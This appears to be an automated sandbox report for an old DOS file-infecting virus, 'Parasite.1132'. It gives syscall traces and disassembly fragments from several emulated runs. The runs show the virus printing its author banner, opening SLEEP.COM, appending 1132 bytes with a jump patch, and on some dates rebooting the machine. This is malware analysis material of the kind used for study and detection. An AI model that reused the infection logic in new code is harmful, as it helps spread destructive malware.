Sample viewer

vx.netlux.org/Virus.DOS.Parasite.1132

Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-17T22:24:08.874775702Z 47 PC: 12a85 | Get disk transfer address
2018-12-17T22:24:08.876058066Z 26 PC: 12a6a | Set disk transfer address
2018-12-17T22:24:08.877783673Z 42 PC: 12a94 | Get date
0x12a94: cmp al, 1
0x12a96: jge 0x12a9b
0x12a98: jmp 0x12aef
0x12a9a: nop
0x12a9b: cmp al, 1
0x12a9d: ja 0x12aef
0x12a9f: jmp 0x12b50
0x12aa2: mov ah, 2
0x12aa4: mov dl, 0x50
0x12aa6: int 0x21
0x12aa8: mov dl, 0x61
0x12aaa: int 0x21
0x12aac: mov dl, 0x72
0x12aae: int 0x21
0x12ab0: mov dl, 0x61
0x12ab2: int 0x21
0x12ab4: mov dl, 0x73
0x12ab6: int 0x21
0x12ab8: mov dl, 0x69
0x12aba: int 0x21
2018-12-17T22:24:08.880950582Z 2 PC: 12aa8 | Character output (Char = '50')
2018-12-17T22:24:08.884546943Z 2 PC: 12aac | Character output (Char = '61')
2018-12-17T22:24:08.888009503Z 2 PC: 12ab0 | Character output (Char = '72')
2018-12-17T22:24:08.890836231Z 2 PC: 12ab4 | Character output (Char = '61')
2018-12-17T22:24:08.893597045Z 2 PC: 12ab8 | Character output (Char = '73')
2018-12-17T22:24:08.896639335Z 2 PC: 12abc | Character output (Char = '69')
2018-12-17T22:24:08.899135142Z 2 PC: 12ac0 | Character output (Char = '74')
2018-12-17T22:24:08.901880824Z 2 PC: 12ac4 | Character output (Char = '65')
2018-12-17T22:24:08.905197174Z 2 PC: 12ac8 | Character output (Char = '20')
2018-12-17T22:24:08.907899929Z 2 PC: 12acc | Character output (Char = '56')
2018-12-17T22:24:08.910412675Z 2 PC: 12ad0 | Character output (Char = '69')
2018-12-17T22:24:08.912804866Z 2 PC: 12ad4 | Character output (Char = '72')
2018-12-17T22:24:08.915977648Z 2 PC: 12ad8 | Character output (Char = '75')
2018-12-17T22:24:08.918890741Z 2 PC: 12adc | Character output (Char = '73')
2018-12-17T22:24:08.921823896Z 2 PC: 12ae0 | Character output (Char = '21')
2018-12-17T22:24:08.925172127Z 2 PC: 12ae4 | Character output (Char = '20')
2018-12-17T22:24:08.92812669Z 2 PC: 12ae8 | Character output (Char = '62')
2018-12-17T22:24:08.931040953Z 2 PC: 12aec | Character output (Char = '79')
2018-12-17T22:24:08.934753683Z 2 PC: 12af6 | Character output (Char = '20')
2018-12-17T22:24:08.9374307Z 2 PC: 12afa | Character output (Char = '52')
2018-12-17T22:24:08.940052995Z 2 PC: 12afe | Character output (Char = '6f')
2018-12-17T22:24:08.943381008Z 2 PC: 12b02 | Character output (Char = '63')
2018-12-17T22:24:08.9458242Z 2 PC: 12b06 | Character output (Char = '6b')
2018-12-17T22:24:08.948571896Z 2 PC: 12b0a | Character output (Char = '20')
2018-12-17T22:24:08.952426522Z 2 PC: 12b0e | Character output (Char = '53')
2018-12-17T22:24:08.954929204Z 2 PC: 12b12 | Character output (Char = '74')
2018-12-17T22:24:08.957189072Z 2 PC: 12b16 | Character output (Char = '65')
2018-12-17T22:24:08.960103673Z 2 PC: 12b1a | Character output (Char = '61')
2018-12-17T22:24:08.962631454Z 2 PC: 12b1e | Character output (Char = '64')
2018-12-17T22:24:08.965948662Z 2 PC: 12b22 | Character output (Char = '79')
2018-12-17T22:24:08.968593059Z 2 PC: 12b26 | Character output (Char = '20')
2018-12-17T22:24:08.971435808Z 2 PC: 12b2a | Character output (Char = '5b')
2018-12-17T22:24:08.97366631Z 2 PC: 12b2e | Character output (Char = '4e')
2018-12-17T22:24:08.976245069Z 2 PC: 12b32 | Character output (Char = '75')
2018-12-17T22:24:08.978887221Z 2 PC: 12b36 | Character output (Char = '6b')
2018-12-17T22:24:08.981138964Z 2 PC: 12b3a | Character output (Char = '45')
2018-12-17T22:24:08.983402246Z 2 PC: 12b3e | Character output (Char = '5d')
2018-12-17T22:24:08.986506135Z 2 PC: 12b42 | Character output (Char = '20')
2018-12-17T22:24:08.989012956Z 2 PC: 12b46 | Character output (Char = '48')
2018-12-17T22:24:08.991527831Z 2 PC: 12b4a | Character output (Char = '50')
2018-12-17T22:24:08.995247924Z 78 PC: 12c2e | Find first file
2018-12-17T22:24:09.001911359Z 67 PC: 12c6c | Get or set file attributes
2018-12-17T22:24:09.008056358Z 67 PC: 12c7e | Get or set file attributes
2018-12-17T22:24:09.028020726Z 61 PC: 12c89 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:09.03554932Z 87 PC: 12c95 | Get or set file date and time
2018-12-17T22:24:09.037321188Z 44 PC: 12ca1 | Get time
0x12ca1: and dh, 7
0x12ca4: jmp 0x12ca7
0x12ca6: nop
0x12ca7: mov ah, 0x3f
0x12ca9: mov cx, 3
0x12cac: mov dx, 0xed
0x12caf: nop
0x12cb0: add dx, si
0x12cb2: int 0x21
0x12cb4: jb 0x12d0b
0x12cb6: cmp ax, 3
0x12cb9: jne 0x12d0b
0x12cbb: mov ax, 0x4202
0x12cbe: mov cx, 0
0x12cc1: mov dx, 0
0x12cc4: int 0x21
0x12cc6: jb 0x12d0b
0x12cc8: mov cx, ax
0x12cca: sub ax, 3
0x12ccd: mov word ptr [si + 0xf1], ax
2018-12-17T22:24:09.040516703Z 63 PC: 12cb4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:24:09.048289957Z 66 PC: 12cc6 | Move file pointer
2018-12-17T22:24:09.049985806Z 64 PC: 12cea | Write file or device (Write 1132 bytes on handle 5)
2018-12-17T22:24:09.060847758Z 66 PC: 12cfc | Move file pointer
2018-12-17T22:24:09.06276368Z 64 PC: 12d0b | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:24:09.070347916Z 87 PC: 12d1e | Get or set file date and time
2018-12-17T22:24:09.073081519Z 62 PC: 12d22 | Close file
2018-12-17T22:24:09.082387751Z 67 PC: 12d31 | Get or set file attributes
2018-12-17T22:24:09.093628156Z 26 PC: 12d3e | Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4237,"SideJobID":0}

Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-25T11:51:21.584649573Z 47 PC: 12a85 | Get disk transfer address
2018-12-25T11:51:21.585774891Z 26 PC: 12a6a | Set disk transfer address
2018-12-25T11:51:21.587534032Z 42 PC: 12a94 | Get date
0x12a94: cmp al, 1
0x12a96: jge 0x12a9b
0x12a98: jmp 0x12aef
0x12a9a: nop
0x12a9b: cmp al, 1
0x12a9d: ja 0x12aef
0x12a9f: jmp 0x12b50
0x12aa2: mov ah, 2
0x12aa4: mov dl, 0x50
0x12aa6: int 0x21
0x12aa8: mov dl, 0x61
0x12aaa: int 0x21
0x12aac: mov dl, 0x72
0x12aae: int 0x21
0x12ab0: mov dl, 0x61
0x12ab2: int 0x21
0x12ab4: mov dl, 0x73
0x12ab6: int 0x21
0x12ab8: mov dl, 0x69
0x12aba: int 0x21
2018-12-25T11:51:21.590257672Z 2 PC: 12aa8 | Character output (Char = '50')
2018-12-25T11:51:21.592480579Z 2 PC: 12aac | Character output (Char = '61')
2018-12-25T11:51:21.595217087Z 2 PC: 12ab0 | Character output (Char = '72')
2018-12-25T11:51:21.597486214Z 2 PC: 12ab4 | Character output (Char = '61')
2018-12-25T11:51:21.599731012Z 2 PC: 12ab8 | Character output (Char = '73')
2018-12-25T11:51:21.602554894Z 2 PC: 12abc | Character output (Char = '69')
2018-12-25T11:51:21.604905093Z 2 PC: 12ac0 | Character output (Char = '74')
2018-12-25T11:51:21.60710234Z 2 PC: 12ac4 | Character output (Char = '65')
2018-12-25T11:51:21.610014793Z 2 PC: 12ac8 | Character output (Char = '20')
2018-12-25T11:51:21.612217063Z 2 PC: 12acc | Character output (Char = '56')
2018-12-25T11:51:21.61439832Z 2 PC: 12ad0 | Character output (Char = '69')
2018-12-25T11:51:21.616763618Z 2 PC: 12ad4 | Character output (Char = '72')
2018-12-25T11:51:21.619405175Z 2 PC: 12ad8 | Character output (Char = '75')
2018-12-25T11:51:21.621673525Z 2 PC: 12adc | Character output (Char = '73')
2018-12-25T11:51:21.623814862Z 2 PC: 12ae0 | Character output (Char = '21')
2018-12-25T11:51:21.626203093Z 2 PC: 12ae4 | Character output (Char = '20')
2018-12-25T11:51:21.628344219Z 2 PC: 12ae8 | Character output (Char = '62')
2018-12-25T11:51:21.630491329Z 2 PC: 12aec | Character output (Char = '79')
2018-12-25T11:51:21.63354063Z 2 PC: 12af6 | Character output (Char = '20')
2018-12-25T11:51:21.63676654Z 2 PC: 12afa | Character output (Char = '52')
2018-12-25T11:51:21.638914913Z 2 PC: 12afe | Character output (Char = '6f')
2018-12-25T11:51:21.641600618Z 2 PC: 12b02 | Character output (Char = '63')
2018-12-25T11:51:21.64399828Z 2 PC: 12b06 | Character output (Char = '6b')
2018-12-25T11:51:21.646356628Z 2 PC: 12b0a | Character output (Char = '20')
2018-12-25T11:51:21.649382459Z 2 PC: 12b0e | Character output (Char = '53')
2018-12-25T11:51:21.651763231Z 2 PC: 12b12 | Character output (Char = '74')
2018-12-25T11:51:21.655299147Z 2 PC: 12b16 | Character output (Char = '65')
2018-12-25T11:51:21.658266846Z 2 PC: 12b1a | Character output (Char = '61')
2018-12-25T11:51:21.660608688Z 2 PC: 12b1e | Character output (Char = '64')
2018-12-25T11:51:21.662976761Z 2 PC: 12b22 | Character output (Char = '79')
2018-12-25T11:51:21.665420839Z 2 PC: 12b26 | Character output (Char = '20')
2018-12-25T11:51:21.668038608Z 2 PC: 12b2a | Character output (Char = '5b')
2018-12-25T11:51:21.670329966Z 2 PC: 12b2e | Character output (Char = '4e')
2018-12-25T11:51:21.672754358Z 2 PC: 12b32 | Character output (Char = '75')
2018-12-25T11:51:21.675117194Z 2 PC: 12b36 | Character output (Char = '6b')
2018-12-25T11:51:21.677326293Z 2 PC: 12b3a | Character output (Char = '45')
2018-12-25T11:51:21.68098142Z 2 PC: 12b3e | Character output (Char = '5d')
2018-12-25T11:51:21.683691507Z 2 PC: 12b42 | Character output (Char = '20')
2018-12-25T11:51:21.685927433Z 2 PC: 12b46 | Character output (Char = '48')
2018-12-25T11:51:21.68829734Z 2 PC: 12b4a | Character output (Char = '50')
2018-12-25T11:51:21.691189476Z 78 PC: 12c2e | Find first file
2018-12-25T11:51:21.697994355Z 67 PC: 12c6c | Get or set file attributes
2018-12-25T11:51:21.713100341Z 67 PC: 12c7e | Get or set file attributes
2018-12-25T11:51:22.595109818Z 61 PC: 12c89 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:22.603512882Z 87 PC: 12c95 | Get or set file date and time
2018-12-25T11:51:22.605499684Z 44 PC: 12ca1 | Get time
0x12ca1: and dh, 7
0x12ca4: jmp 0x12ca7
0x12ca6: nop
0x12ca7: mov ah, 0x3f
0x12ca9: mov cx, 3
0x12cac: mov dx, 0xed
0x12caf: nop
0x12cb0: add dx, si
0x12cb2: int 0x21
0x12cb4: jb 0x12d0b
0x12cb6: cmp ax, 3
0x12cb9: jne 0x12d0b
0x12cbb: mov ax, 0x4202
0x12cbe: mov cx, 0
0x12cc1: mov dx, 0
0x12cc4: int 0x21
0x12cc6: jb 0x12d0b
0x12cc8: mov cx, ax
0x12cca: sub ax, 3
0x12ccd: mov word ptr [si + 0xf1], ax
2018-12-25T11:51:22.608391818Z 63 PC: 12cb4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:22.61682952Z 66 PC: 12cc6 | Move file pointer
2018-12-25T11:51:22.618644339Z 64 PC: 12cea | Write file or device (Write 1132 bytes on handle 5)
2018-12-25T11:51:22.629843642Z 66 PC: 12cfc | Move file pointer
2018-12-25T11:51:22.633057438Z 64 PC: 12d0b | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:22.641067965Z 87 PC: 12d1e | Get or set file date and time
2018-12-25T11:51:22.642795717Z 62 PC: 12d22 | Close file
2018-12-25T11:51:22.65038868Z 67 PC: 12d31 | Get or set file attributes
2018-12-25T11:51:22.658234134Z 26 PC: 12d3e | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4237,"SideJobID":0}

Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-25T11:51:21.613962659Z 47 PC: 12a85 | Get disk transfer address
2018-12-25T11:51:21.615590736Z 26 PC: 12a6a | Set disk transfer address
2018-12-25T11:51:21.616705382Z 42 PC: 12a94 | Get date
0x12a94: cmp al, 1
0x12a96: jge 0x12a9b
0x12a98: jmp 0x12aef
0x12a9a: nop
0x12a9b: cmp al, 1
0x12a9d: ja 0x12aef
0x12a9f: jmp 0x12b50
0x12aa2: mov ah, 2
0x12aa4: mov dl, 0x50
0x12aa6: int 0x21
0x12aa8: mov dl, 0x61
0x12aaa: int 0x21
0x12aac: mov dl, 0x72
0x12aae: int 0x21
0x12ab0: mov dl, 0x61
0x12ab2: int 0x21
0x12ab4: mov dl, 0x73
0x12ab6: int 0x21
0x12ab8: mov dl, 0x69
0x12aba: int 0x21
2018-12-25T11:51:21.618761189Z 44 PC: 12b9c | Get time
0x12b9c: and dh, 0xf
0x12b9f: cmp dh, 3
0x12ba2: jb 0x12b5d
0x12ba4: cmp dh, 3
0x12ba7: ja 0x12bab
0x12ba9: int 0x19
0x12bab: pop si
0x12bac: push si
0x12bad: add si, 0xfd
0x12bb1: lodsb al, byte ptr [si]
0x12bb2: mov cx, 0x8000
0x12bb5: repne scasb al, byte ptr es:[di]
0x12bb7: mov cx, 4
0x12bba: lodsb al, byte ptr [si]
0x12bbb: scasb al, byte ptr es:[di]
0x12bbc: jne 0x12bab
0x12bbe: loop 0x12bba
0x12bc0: pop si
0x12bc1: pop es
0x12bc2: mov word ptr [si + 0xf9], di
2018-12-25T11:51:23.68250236Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:51:23.684049083Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:51:23.686052326Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:51:23.689306049Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:51:23.699469512Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:51:23.70095047Z 62 PC: 91fc1 | Close file
2018-12-25T11:51:23.703640536Z 75 PC: 91fe0 | Execute program
2018-12-25T11:51:23.718849094Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:51:23.720255988Z 9 PC: c605 | Display string (String= '6r&;] u')
2018-12-25T11:51:23.729572948Z 48 PC: c609 | Get DOS version
2018-12-25T11:51:23.732566356Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:51:23.736930222Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:51:23.739256305Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:51:23.742837872Z 9 PC: c6d9 | Display string (String= 'VHVD[email protected]_Kut1Dt a1ZW 5|(Nj(p^')
2018-12-25T11:51:23.748326078Z 9 PC: c6e0 | Display string (String= '5|(Nj(p^')
2018-12-25T11:51:23.756599089Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:51:23.767060838Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:51:23.768459638Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:51:23.770459424Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:51:23.789981773Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:51:23.793404365Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:51:23.794549127Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:51:23.796038479Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:51:23.796987486Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.797973017Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.799447083Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:51:23.81960264Z 62 PC: 8f8eb | Close file
2018-12-25T11:51:23.821321816Z 62 PC: 8f8f2 | Close file
2018-12-25T11:51:23.824365377Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.835770015Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.837175673Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.838671596Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.840239437Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.841540733Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.843132791Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.844879076Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.846127134Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.84743325Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.848989121Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.850373251Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.851688139Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.853567014Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.854899323Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.856228432Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.857977243Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.85930999Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.860579623Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.862475423Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.863939Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.865216638Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.867054694Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.868342178Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.869604222Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.87130827Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.872571999Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.873774532Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.875634349Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.876862551Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:51:23.881335754Z 62 PC: 8f90e | Close file
2018-12-25T11:51:23.884048679Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:51:23.885987519Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:51:23.887924299Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:51:23.893578325Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:51:23.894825629Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:51:23.899289358Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:51:23.901236518Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:51:23.902342882Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:51:23.903878491Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:51:23.905277167Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:51:23.906686045Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:51:23.908191135Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:51:23.910066513Z 73 PC: 8fa11 | Release memory
2018-12-25T11:51:23.911468749Z 73 PC: 8efea | Release memory
2018-12-25T11:51:23.912665278Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:51:23.914509959Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:51:23.916124082Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:51:23.91754796Z 73 PC: 8f060 | Release memory
2018-12-25T11:51:23.919634066Z 61 PC: 8f080 | Open file (Filename = 'r,S[
2018-12-25T11:51:23.928123611Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:51:23.933322312Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:51:23.935083606Z 62 PC: 8f0d1 | Close file
2018-12-25T11:51:23.936669952Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:51:23.956188014Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:51:23.95732599Z 48 PC: 12bee | Get DOS version
2018-12-25T11:51:23.959405321Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:51:23.961517541Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:51:23.963165248Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:51:23.964265456Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:51:23.965518067Z 72 PC: 1355d | Allocate memory
2018-12-25T11:51:23.967432566Z 25 PC: 13596 | Get default drive
2018-12-25T11:51:23.968360448Z 71 PC: 135ad | Get current directory
2018-12-25T11:51:23.970501988Z 59 PC: 135ba | Change current directory
2018-12-25T11:51:23.975700473Z 59 PC: 135c8 | Change current directory
2018-12-25T11:51:23.979049754Z 59 PC: 135d3 | Change current directory
2018-12-25T11:51:23.981092372Z 25 PC: 12d13 | Get default drive
2018-12-25T11:51:23.98220227Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:51:23.983110918Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:51:23.983981938Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:23.985865067Z 80 PC: 1301d | Set current PSP
2018-12-25T11:51:23.986433934Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:51:23.987226541Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.98843354Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.989471197Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:51:23.991098353Z 72 PC: 130ec | Allocate memory
2018-12-25T11:51:23.99324724Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:51:23.999013252Z 62 PC: 131ba | Close file
2018-12-25T11:51:24.000856858Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:51:24.002144062Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:51:24.003330361Z 72 PC: 11991 | Allocate memory
2018-12-25T11:51:24.004684894Z 73 PC: 119b2 | Release memory
2018-12-25T11:51:24.006677295Z 72 PC: 119bd | Allocate memory
2018-12-25T11:51:24.008041745Z 73 PC: 119df | Release memory
2018-12-25T11:51:24.009083046Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:51:24.018986308Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4237,"SideJobID":0}

Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-25T11:51:21.618686782Z 47 PC: 12a85 | Get disk transfer address
2018-12-25T11:51:21.620113806Z 26 PC: 12a6a | Set disk transfer address
2018-12-25T11:51:21.621242578Z 42 PC: 12a94 | Get date
0x12a94: cmp al, 1
0x12a96: jge 0x12a9b
0x12a98: jmp 0x12aef
0x12a9a: nop
0x12a9b: cmp al, 1
0x12a9d: ja 0x12aef
0x12a9f: jmp 0x12b50
0x12aa2: mov ah, 2
0x12aa4: mov dl, 0x50
0x12aa6: int 0x21
0x12aa8: mov dl, 0x61
0x12aaa: int 0x21
0x12aac: mov dl, 0x72
0x12aae: int 0x21
0x12ab0: mov dl, 0x61
0x12ab2: int 0x21
0x12ab4: mov dl, 0x73
0x12ab6: int 0x21
0x12ab8: mov dl, 0x69
0x12aba: int 0x21
2018-12-25T11:51:21.623722101Z 44 PC: 12b9c | Get time
0x12b9c: and dh, 0xf
0x12b9f: cmp dh, 3
0x12ba2: jb 0x12b5d
0x12ba4: cmp dh, 3
0x12ba7: ja 0x12bab
0x12ba9: int 0x19
0x12bab: pop si
0x12bac: push si
0x12bad: add si, 0xfd
0x12bb1: lodsb al, byte ptr [si]
0x12bb2: mov cx, 0x8000
0x12bb5: repne scasb al, byte ptr es:[di]
0x12bb7: mov cx, 4
0x12bba: lodsb al, byte ptr [si]
0x12bbb: scasb al, byte ptr es:[di]
0x12bbc: jne 0x12bab
0x12bbe: loop 0x12bba
0x12bc0: pop si
0x12bc1: pop es
0x12bc2: mov word ptr [si + 0xf9], di
2018-12-25T11:51:23.664136171Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:51:23.665945592Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:51:23.668470543Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:51:23.67053368Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:51:23.678231678Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:51:23.679286143Z 62 PC: 91fc1 | Close file
2018-12-25T11:51:23.680872646Z 75 PC: 91fe0 | Execute program
2018-12-25T11:51:23.69253355Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:51:23.693851037Z 9 PC: c605 | Display string (String= '6r&;] u')
2018-12-25T11:51:23.704408943Z 48 PC: c609 | Get DOS version
2018-12-25T11:51:23.70863055Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:51:23.713247715Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:51:23.715629225Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:51:23.719197431Z 9 PC: c6d9 | Display string (String= 'VHVD[email protected]_Kut1Dt a1ZW 5|(Nj(p^')
2018-12-25T11:51:23.726312258Z 9 PC: c6e0 | Display string (String= '5|(Nj(p^')
2018-12-25T11:51:23.736165688Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:51:23.746754716Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:51:23.748136001Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:51:23.750314635Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:51:23.772530879Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:51:23.776735958Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:51:23.778085677Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:51:23.779266586Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:51:23.780845059Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.782059319Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.783234834Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:51:23.795689097Z 62 PC: 8f8eb | Close file
2018-12-25T11:51:23.797518156Z 62 PC: 8f8f2 | Close file
2018-12-25T11:51:23.799404351Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.803232401Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.804836962Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.806319983Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.808745696Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.810528497Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.812184663Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.814033081Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.815706233Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.817209559Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.818658439Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.820349409Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.822003326Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.823722928Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.82603015Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.828030937Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.830032404Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.832117534Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.833295186Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.834419689Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.836212838Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.837413758Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.838582999Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.840230984Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.841941444Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.843270751Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.844910866Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.84624762Z 62 PC: 8f8f2 | Close file (See above)
